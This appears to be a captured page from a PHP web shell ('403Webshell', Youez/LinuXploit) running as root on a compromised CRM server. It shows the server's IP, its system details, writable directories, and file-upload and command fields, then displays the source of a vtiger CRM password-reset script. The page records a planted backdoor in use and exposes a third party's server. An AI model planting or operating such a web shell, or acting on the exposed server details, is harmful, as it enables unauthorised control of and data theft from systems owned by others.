403Webshell
Server IP : 138.197.176.125  /  Your IP : 216.73.217.54
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux SuiteCRM-8 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.3.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/crest/modules/Users/actions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/crest/modules/Users/actions/ForgotPassword.php
<?php
/*+***********************************************************************************
 * The contents of this file are subject to the vtiger CRM Public License Version 1.0
 * ("License"); You may not use this file except in compliance with the License
 * The Original Code is:  vtiger CRM Open Source
 * The Initial Developer of the Original Code is vtiger.
 * Portions created by vtiger are Copyright (C) vtiger.
 * All Rights Reserved.
 *************************************************************************************/
chdir(dirname(__FILE__)."/../../../");

include_once "include/utils/VtlibUtils.php";
include_once "include/utils/CommonUtils.php";
include_once "includes/Loader.php";
include_once 'includes/runtime/BaseModel.php';
include_once 'includes/runtime/Viewer.php';
include_once "includes/http/Request.php";
include_once "include/Webservices/Custom/ChangePassword.php";
include_once "include/Webservices/Utils.php";
include_once "includes/runtime/EntryPoint.php";

class Users_ForgotPassword_Action {

	public function changePassword($request){

		$request = new Vtiger_Request($request);
		$viewer = Vtiger_Viewer::getInstance();
		$userName = $request->get('username');
		$newPassword = $request->get('password');
		$confirmPassword = $request->get('confirmPassword');
		$shortURLID = $request->get('shorturl_id');
		$secretHash = $request->get('secret_hash');
		$shortURLModel = Vtiger_ShortURL_Helper::getInstance($shortURLID);
		$secretToken = $shortURLModel->handler_data['secret_token'];

		$validateData = array('username'  => $userName,
							'secret_token'=> $secretToken,
							'secret_hash' => $secretHash
						);

		$valid = $shortURLModel->compareEquals($validateData);
		if($valid) {
			$userId = getUserId_Ol($userName);
			$user = Users::getActiveAdminUser();
			$wsUserId = vtws_getWebserviceEntityId('Users', $userId);
                        try{
                            vtws_changePassword($wsUserId, '', $newPassword, $confirmPassword, $user);
                        } catch (Exception $e){
                            $viewer->assign('ERROR', true);
                            $viewer->assign('MESSAGE', html_entity_decode($e->getMessage()));
                        }
		} else {
			$viewer->assign('ERROR', true);
                        $viewer->assign('MESSAGE', 'Error, please retry setting the password!!');
		}
                    $shortURLModel->delete();
                    $viewer->assign('USERNAME', $userName);
                    $viewer->assign('PASSWORD', $newPassword);
		$viewer->view('FPLogin.tpl', 'Users');
	}

	public static function run($request){
		$instance = new self();
		$instance->changePassword($request);
	}
}

Users_ForgotPassword_Action::run($_REQUEST);

Youez - 2016 - github.com/yon3zu
LinuXploit